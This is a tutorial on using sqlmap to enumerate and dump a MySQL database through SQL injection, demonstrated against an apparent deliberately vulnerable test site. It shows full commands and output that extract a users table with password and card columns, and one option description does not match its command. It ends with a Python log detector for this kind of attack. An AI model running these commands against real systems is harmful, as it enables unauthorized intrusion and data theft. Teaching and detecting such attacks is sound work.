Database enumeration techniques with sqlmap
Database enumeration with sqlmap
We will now look at some enumeration techniques for extracting useful information from the database. To learn more about the services the web application is connected to, we can use the options:
- --banner
- --fingerprint
Similarly, to obtain the list of users and passwords:
- --users
- --passwords
To check whether the user is an administrator:
--is-dba
NOTE: not all of this information is always accessible.
We will now see how to extract the contents of the database step by step. We start by specifying the "--dbs" option to obtain the list of available databases:
```
$ sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -o --threads 10 --dbms Mysql --dbs
...
[12:47:32] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake)
web application technology: Apache 2.0.55, PHP 5.1.2
back-end DBMS: MySQL 5.0
[12:47:32] [INFO] fetching database names
[12:47:32] [INFO] the SQL query used returns 3 entries
[12:47:33] [INFO] retrieved: information_schema
[12:47:33] [INFO] retrieved: acuart
[12:47:33] [INFO] retrieved: modrewriteShop
available databases [3]:
[*] acuart
[*] information_schema
[*] modrewriteShop

[12:47:33] [INFO] Fetched data logged to text files under '/home/user/.sqlmap/output/testphp.vulnweb.com'

[*] shutting down at: 12:47:33
```
To enumerate the tables of the "acuart" database, add the options "-D acuart --tables" to the previous command:
```
$ sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -o --threads 10 --dbms Mysql -D acuart --tables
[...]
[12:48:46] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake)
web application technology: Apache 2.0.55, PHP 5.1.2
back-end DBMS: MySQL 5.0
[12:48:46] [INFO] fetching tables for database 'acuart'
[12:48:46] [INFO] the SQL query used returns 7 entries
[12:48:46] [INFO] retrieved: acuart
[12:48:47] [INFO] retrieved: artists
[12:48:47] [INFO] retrieved: acuart
[12:48:47] [INFO] retrieved: carts
[12:48:47] [INFO] retrieved: acuart
[12:48:47] [INFO] retrieved: categ
[12:48:47] [INFO] retrieved: acuart
[12:48:47] [INFO] retrieved: featured
[12:48:48] [INFO] retrieved: acuart
[12:48:48] [INFO] retrieved: guestbook
[12:48:48] [INFO] retrieved: acuart
[12:48:48] [INFO] retrieved: pictures
[12:48:48] [INFO] retrieved: acuart
[12:48:48] [INFO] retrieved: users
Database: acuart
[7 tables]
+-----------+
| artists   |
| carts     |
| categ     |
| featured  |
| guestbook |
| pictures  |
| users     |
+-----------+

[12:48:48] [INFO] Fetched data logged to text files under '/home/user/.sqlmap/output/testphp.vulnweb.com'

[*] shutting down at: 12:48:48
```
We can now list the columns of the "users" table with the "--columns" option:
```
$ sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -o --threads 10 --dbms Mysql -D acuart -T users --columns
[...]
[12:49:27] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake)
web application technology: Apache 2.0.55, PHP 5.1.2
back-end DBMS: MySQL 5.0
[12:49:27] [INFO] fetching columns for table 'users' on database 'acuart'
[12:49:27] [INFO] the SQL query used returns 8 entries
[12:49:28] [INFO] retrieved: uname
[12:49:28] [INFO] retrieved: varchar(100)
[12:49:28] [INFO] retrieved: pass
[12:49:28] [INFO] retrieved: varchar(100)
[12:49:28] [INFO] retrieved: cc
[12:49:28] [INFO] retrieved: varchar(100)
[12:49:28] [INFO] retrieved: address
[12:49:29] [INFO] retrieved: mediumtext
[12:49:29] [INFO] retrieved: email
[12:49:29] [INFO] retrieved: varchar(100)
[12:49:29] [INFO] retrieved: name
[12:49:29] [INFO] retrieved: varchar(100)
[12:49:29] [INFO] retrieved: phone
[12:49:29] [INFO] retrieved: varchar(100)
[12:49:30] [INFO] retrieved: cart
[12:49:30] [INFO] retrieved: varchar(100)
Database: acuart
Table: users
[8 columns]
+---------+--------------+
| Column  | Type         |
+---------+--------------+
| address | mediumtext   |
| cart    | varchar(100) |
| cc      | varchar(100) |
| email   | varchar(100) |
| name    | varchar(100) |
| pass    | varchar(100) |
| phone   | varchar(100) |
| uname   | varchar(100) |
+---------+--------------+

[12:49:30] [INFO] Fetched data logged to text files under '/home/user/.sqlmap/output/testphp.vulnweb.com'

[*] shutting down at: 12:49:30
```
Finally, we retrieve the contents of the "users" table, limiting ourselves to the first two tuples with the options "--dump --start 1 --stop 3":
```
$ sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -o --threads 10 --dbms Mysql -D acuart -T users --dump --start 1 --stop 5
[...]
[12:59:19] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake)
web application technology: Apache 2.0.55, PHP 5.1.2
back-end DBMS: MySQL 5.0
[12:59:19] [INFO] fetching columns for table 'users' on database 'acuart'
[12:59:19] [INFO] the SQL query used returns 8 entries
[12:59:20] [INFO] retrieved: uname
[12:59:20] [INFO] retrieved: varchar(100)
[12:59:20] [INFO] retrieved: pass
[12:59:20] [INFO] retrieved: varchar(100)
[12:59:20] [INFO] retrieved: cc
[12:59:20] [INFO] retrieved: varchar(100)
[12:59:20] [INFO] retrieved: address
[12:59:21] [INFO] retrieved: mediumtext
[12:59:21] [INFO] retrieved: email
[12:59:21] [INFO] retrieved: varchar(100)
[12:59:21] [INFO] retrieved: name
[12:59:21] [INFO] retrieved: varchar(100)
[12:59:21] [INFO] retrieved: phone
[12:59:21] [INFO] retrieved: varchar(100)
[12:59:22] [INFO] retrieved: cart
[12:59:22] [INFO] retrieved: varchar(100)
[12:59:22] [INFO] fetching entries for table 'users' on database 'acuart'
[12:59:22] [INFO] retrieved: cacucko
[12:59:22] [INFO] retrieved: cacucko
[12:59:22] [INFO] retrieved: cacucko
[12:59:22] [INFO] retrieved: gopala
[12:59:23] [INFO] retrieved: 1b90caf669e05660efdf1d23b48100fa
[12:59:23] [INFO] retrieved: gopala
[12:59:23] [INFO] retrieved: hacked by cacucko!
[12:59:23] [INFO] retrieved: Russian hackers!
[12:59:23] [INFO] retrieved: gopala
[12:59:23] [INFO] retrieved: gopala
[12:59:23] [INFO] retrieved: gopala
[12:59:23] [INFO] retrieved: gopala
[12:59:24] [INFO] retrieved: 1b90caf669e05660efdf1d23b48100fa
[12:59:24] [INFO] retrieved: test
[12:59:24] [INFO] retrieved: gopala
[12:59:24] [INFO] retrieved: gopala
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] n
Database: acuart
Table: users
[2 entries]
+--------------------+----------------------------------+---------+------------------+---------+--------+---------+--------+
| address            | cart                             | cc      | email            | name    | pass   | phone   | uname  |
+--------------------+----------------------------------+---------+------------------+---------+--------+---------+--------+
| hacked by cacucko! | 1b90caf669e05660efdf1d23b48100fa | cacucko | Russian hackers! | cacucko | gopala | cacucko | gopala |
| gopala             | 1b90caf669e05660efdf1d23b48100fa | gopala  | gopala           | gopala  | gopala | gopala  | test   |
+--------------------+----------------------------------+---------+------------------+---------+--------+---------+--------+

[12:59:30] [INFO] Table 'acuart.users' dumped to CSV file '/home/user/.sqlmap/output/testphp.vulnweb.com/dump/acuart/users.csv'
[12:59:30] [INFO] Fetched data logged to text files under '/home/user/.sqlmap/output/testphp.vulnweb.com'

[*] shutting down at: 12:59:30
```
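From the defender's side, the enumeration steps above leave traces in the web server's access log: on MySQL 5.x the database, table and column names are read from information_schema, and sqlmap's default User-Agent starts with "sqlmap/". The following is an added example, not part of the original guide; the log lines, IP addresses and the names `normalize` and `analyze` are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed access-log lines (Apache combined format, documentation IP ranges).
SAMPLE_LOG = """\
198.51.100.7 - - [01/Jan/2024:12:47:32 +0000] "GET /listproducts.php?cat=1%20AND%20(SELECT%20COUNT(*)%20FROM%20INFORMATION_SCHEMA.SCHEMATA) HTTP/1.1" 200 512 "-" "sqlmap/1.7 (https://sqlmap.org)"
198.51.100.7 - - [01/Jan/2024:12:48:46 +0000] "GET /listproducts.php?cat=1%20AND%20(SELECT%20COUNT(*)%20FROM%20information_schema%2F%2A%2A%2F.tables) HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [01/Jan/2024:12:49:27 +0000] "GET /listproducts.php?cat=1%2520AND%2520(SELECT%2520COUNT(*)%2520FROM%2520INFORMATION_SCHEMA%252ECOLUMNS) HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [01/Jan/2024:12:50:01 +0000] "GET /listproducts.php?cat=1 HTTP/1.1" 200 7880 "-" "Mozilla/5.0"
"""

# Captures client IP, request URL and User-Agent from a combined-format line.
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" \d{3} \S+ "[^"]*" "([^"]*)"')

# Catalog views read when listing databases, tables and columns on MySQL 5.x.
STAGES = {
    "databases": re.compile(r"information_schema\.schemata", re.I),
    "tables": re.compile(r"information_schema\.tables", re.I),
    "columns": re.compile(r"information_schema\.columns", re.I),
}

def normalize(url):
    """URL-decode up to three times, then drop SQL comments, backticks and whitespace."""
    for _ in range(3):
        decoded = unquote_plus(url)
        if decoded == url:
            break
        url = decoded
    return re.sub(r"/\*.*?\*/|[\s`]+", "", url)

def analyze(log_text):
    """Return {client_ip: {"stages": set, "tool_ua": bool}} for suspicious clients only."""
    findings = defaultdict(lambda: {"stages": set(), "tool_ua": False})
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue  # not a combined-format line
        ip, url, agent = m.groups()
        flat = normalize(url)
        hits = {name for name, rx in STAGES.items() if rx.search(flat)}
        tool_ua = agent.lower().startswith("sqlmap/")
        if hits or tool_ua:
            findings[ip]["stages"] |= hits
            findings[ip]["tool_ua"] |= tool_ua
    return dict(findings)

if __name__ == "__main__":
    for ip, info in analyze(SAMPLE_LOG).items():
        print(ip, sorted(info["stages"]), "sqlmap User-Agent:", info["tool_ua"])
```

The User-Agent check is the weaker signal because the header is client-controlled; the catalog-view patterns on a product-listing parameter are the more durable one.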